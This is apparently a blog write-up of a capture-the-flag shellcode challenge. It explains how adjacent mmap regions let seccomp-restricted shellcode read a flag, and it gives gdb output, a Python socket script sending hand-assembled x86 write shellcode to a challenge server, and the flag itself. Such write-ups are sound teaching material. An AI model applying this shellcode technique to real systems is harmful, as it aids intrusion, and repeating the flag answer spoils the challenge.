The binary makes 2 mmap() calls. One region is RWX into which user supplied shellcode is copied and executed. Flag is copied into other region. Then seccomp is used to restrict syscalls that we could make. The white list includes read, write, exit and exit_group syscalls.
In current Linux ASLR, two mmap'ed region will be placed adjacent to each other. Knowing the address of one region, we could compute the address of other as the offsets are fixed. This is what the memory looks like
gdb-peda$ vmmap Start End Perm Name 0xf7fd6000 0xf7fd8000 rwxp mapped 0xf7fd8000 0xf7fdb000 rw-p mapped gdb-peda$ x/s 0xf7fd8000 0xf7fd8000: "thisisaflag"So we need a shellcode to write the flag to stdout from a known offset. Below is the solution:
#!/usr/bin/env python import socket ip = "127.0.0.1" ip = "54.163.248.69" port = 9001 soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.connect((ip, port)) # nasm > mov eax, 0x4 # 00000000 B804000000 mov eax,0x4 # nasm > mov ebx, 0x1 # 00000000 BB01000000 mov ebx,0x1 # nasm > lea ecx, [ecx+0x2000] # 00000000 8D8900200000 lea ecx,[ecx+0x2000] # nasm > mov edx, 0x100 # 00000000 BA00010000 mov edx,0x100 # nasm > int 0x80 # 00000000 CD80 int 0x80 payload = 'B804000000BB010000008D8900200000BA00010000CD80'.decode('hex') soc.send(payload + chr(0xa)) print soc.recv(0x100)Flag for the challenge is d3sp3r4t3_sh3llc0d3
No comments :
Post a Comment